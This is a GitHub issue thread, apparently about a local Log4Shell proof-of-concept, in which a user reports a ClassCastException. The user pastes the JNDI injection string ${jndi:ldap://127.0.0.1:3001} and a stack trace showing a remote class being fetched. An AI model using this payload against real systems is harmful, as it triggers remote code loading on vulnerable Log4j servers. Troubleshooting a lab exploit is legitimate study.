This repository has been archived by the owner on Jun 12, 2022. It is now read-only.
I get java.lang.ClasCastException for Main #2
Comments
|
Never mind - I see that's normal. Just need to edit Main.java to do something valid on Linux. Thanks. |
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Thanks a ton for your great local exploit! I'm just having a problem on Ubuntu with OpenJDK 11. When I tun the log4j-client-1.0-SNAPSHOT.jar file and pass in the string ${jndi:ldap://127.0.0.1:3001}, I get the following error:
Mon Dec 13 2021 08:50:12 GMT-0800 (Pacific Standard Time) Request was made: /Main.class
2021-12-13 08:50:12,761 main WARN Error looking up JNDI resource [ldap://127.0.0.1:3001/]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')]; remaining name ''
at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1121)
at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)
at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:207)
at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:198)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1060)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:982)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:878)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:433)
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:341)
at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:240)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:225)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)
at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:543)
at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:502)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:485)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:460)
at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82)
at org.apache.logging.log4j.core.Logger.log(Logger.java:162)
at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2190)
at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2144)
at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2127)
at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2003)
at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1975)
at org.apache.logging.log4j.spi.AbstractLogger.trace(AbstractLogger.java:2330)
at win.roto.client.Main.main(Main.java:33)
Caused by: java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')
at java.naming/javax.naming.spi.NamingManager.getObjectFactoryFromReference(NamingManager.java:179)
at java.naming/javax.naming.spi.DirectoryManager.getObjectInstance(DirectoryManager.java:188)
at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1114)
... 38 more
I can see that it's certainly trying to trigger the vulnerability, but fails.
The text was updated successfully, but these errors were encountered: